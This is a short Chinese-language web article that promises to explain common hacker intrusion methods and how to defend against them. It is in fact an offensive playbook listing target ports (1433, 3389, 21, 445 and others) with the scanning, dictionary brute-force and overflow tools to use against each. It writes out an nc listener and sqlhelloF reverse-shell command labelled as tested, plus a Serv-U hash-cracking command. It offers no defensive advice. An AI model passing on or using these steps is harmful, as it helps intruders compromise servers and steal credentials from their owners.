常見的黑客入侵方法與防範
本文簡單介紹目前黑客最常使用的一些入侵工具及防禦的方法,希望能對大家有所幫助,以助於大家能更好地防禦黑客的攻擊,下面小編來告訴你吧!
1. 利用4899埠入侵
4899埠是一個遠端控制軟體***remote administrator***服務端監聽的埠,他不能算是一個木馬程式,但是具有遠端控制功能,通常防毒軟體是無法查出它來的
用4899過濾器.exe,掃描空口令的機器
2. 利用3899的入侵
對很早的機器,可以試試3389的溢位
對2000的機器,可以試試字典暴破。
3.利用1433埠入侵
1433埠,是SQL Server預設的埠,SQL Server服務使用兩個埠:TCP-1433、UDP-1434。其中1433用於供SQL Server對外提供服務,1434用於向請求者返回SQL Server使用了哪個TCP/IP埠。
scanport.exe 查有1433的機器
SQLScanPass.exe 進行字典暴破***字典是關鍵***
最後 SQLTools.exe入侵
對sql的sp2及以下的系統,可用sql的hello 溢位漏洞入侵。
nc -vv -l -p 本機埠 sqlhelloF.exe 入侵ip 1433 本機ip 本機埠
***以上反向的,測試成功***
sqlhelloz.exe 入侵ip 1433 ***這個是正向連線***
4. 利用80埠入侵
80埠是為HTTP***HyperText Transport Protocol***即超文字傳輸協議開放的,此為上網衝浪使用次數最多的協議,主要用於WWW***World Wide Web***即全球資訊網傳輸資訊的協議。可以通過HTTP地址***即常說的“網址”***加“:80”來訪問網站,因為瀏覽網頁服務預設的埠號都是80,因此只需輸入網址即可,不用輸入“:80”了。
對sp3以前的機器,可以用webdav入侵;
對bbs論壇,可以試試上傳漏洞***upfile.exe或dvup_delphi.exe***
可以利用SQL進行注入。***小榕的注入軟體***。
5. 利用serv-u入侵***21埠***
21埠主要用於FTP***File Transfer Protocol,檔案傳輸協議***服務,FTP服務主要是為了在兩臺計算機之間實現檔案的上傳與下載,一臺計算機作為FTP客戶端,另一臺計算機作為FTP伺服器,可以採用匿名***anonymous***登入和授權使用者名稱與密碼登入兩種方式登入FTP伺服器。
對5. 004及以下系統,可用溢位入侵。***serv5004.exe***
對5.1.0.0及以下系統,可用本地提升許可權。***servlocal.exe***
對serv-u的MD5加密密碼,可以用字典暴破。***crack.vbs***
輸入一個被serv-u加密的密碼***34位長***,通過與字典檔***dict.txt***的比較,得到密碼。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6. 利用554埠
用real554.exe入侵。
7. 利用6129埠
用DameWare6129.exe入侵。
8. 利用系統漏洞
利用135、445埠,用ms03026、ms03039、ms03049、ms04011漏洞,
進行溢位入侵。
9. 利用3127等埠
可以利用doom病毒開的埠,用nodoom.exe入侵。***可用mydoomscan.exe查***。
10. 利用其他入侵
利用shanlu的入侵軟體入侵***WINNTAutoAttack.exe***。